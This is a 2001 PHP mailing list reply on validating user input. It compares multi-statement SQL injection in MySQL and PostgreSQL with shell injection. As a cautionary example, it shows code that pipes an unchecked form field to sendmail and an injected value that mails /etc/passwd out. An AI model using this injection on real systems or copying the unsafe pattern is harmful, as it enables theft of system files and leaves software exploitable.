> At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote:
> > > I've done something similar in the past just for kicks, and I got the same
> > > result you did (i.e. an error). I believe this is because mysql_query()
> > > expects ONE query at a time and will break if you send two or more. I
> > > could be completely and totally wrong about that, though (someone please
> > > correct me if I am)...
> >
> >Maybe this one failed, but it's always a good idea to check user input.
> >Let's say you're emailing a form and you don't use the mail() function,
> >but make a call directly to sendmail... and you're sloppy... so you do
> >this:
> [...]
>
> True. But we were speaking specifically about MySQL. When you start
> toying with external programs and exec() and so forth then you've opened up
> a whole other can of worms security-wise...
True, but why take the chance? :) I didn't see an equivalent for MySQL,
but PostgreSQL has a pg_put_line() which just sends a NULL terminated
string to the backend so you can do whatever you want (ie. multi
statement). So in that case things could get messed up.
>
> >$fp = fopen("|/usr/bin/sendmail $sendto");
> >#write stuff to pipe to send email...
> >
> >Now... what if when I filled out the form I set $sendto equal to this:
> >
> >[EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd
>
> A definite possibility, but it does depend on the hacker in question
> knowing exactly how your script is written...
True, but in a shared hosting environment this is very likely.
-philip
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
